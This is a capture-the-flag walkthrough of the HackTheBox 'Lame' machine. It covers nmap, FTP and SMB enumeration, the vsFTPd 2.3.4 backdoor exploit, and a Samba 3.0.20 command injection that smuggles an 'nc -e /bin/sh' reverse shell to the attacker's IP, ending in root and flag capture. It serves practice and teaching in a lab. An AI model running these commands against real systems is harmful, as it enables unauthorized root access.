Lame

#Linux #Enumeration #FTP #SMB

Lame is an easy-rated Linux machine from HackTheBox created by ch4p. This machine has no mystery, which is suitable for practice. In this case, you find something and search for that exploit. In the current post, my IP is 10.10.14.49, and the target’s IP is 10.129.223.149

Gather Information

Local Terminal

nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts

Local Terminal

nmap -sCV -p 21,22,139,445,3632 10.129.223.149 -oN Target

Port 21 Anonymous allowed and the version is included, vsFTPd 2.3.4, perfect, we will search about that. And the port 139 is another SMB but from a different workgroup.

Local Terminal

ftp 10.129.223.149			# user : anonymous , pass : anonymous

Local Terminal

crackmapexec smb 10.129.223.149
smbmap -H 10.129.223.149

Local Terminal

smbclient -L 10.129.223.149 -N

Local Terminal

smbclient //10.129.223.129/tmp -N

And we can’t login with null?

Exploitation

At this point we have the following information, an Port 21 FTP vsFTPd 2.3.4, Port 139 SMB (unknown version) and Port 445 SMB (3.0.20)

Search: vsFTPd 2.3.4 exploit

Local Terminal

git clone https://github.com/ahervias77/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
batcat vsftpd_234_exploit.py

Local Terminal

python3 vsftpd_234_exploit.py 10.129.223.149 21 whoami

At https://www.exploit-db.com/ search for Samba 3.0.20 (Windows issue), and download the exploit from https://www.exploit-db.com/exploits/16320

Local Terminal

batcat 16320.rb

Local Terminal [A]

nc - nlvp 443

Local Terminal [B]

smbclient //10.129.223.149/tmp -N --option='client min protocol=NT1'
logon "/=`nohup nc -e /bin/sh 10.10.14.49 443 `"

As you can see, we are connected as root, so we can get both flags directly.

Target Terminal [Root]

script /dev/null -c bash
cat /home/makis/user.txt
cat /root/root.txt

PreviousIrked NextMirai

Last updated 10 months ago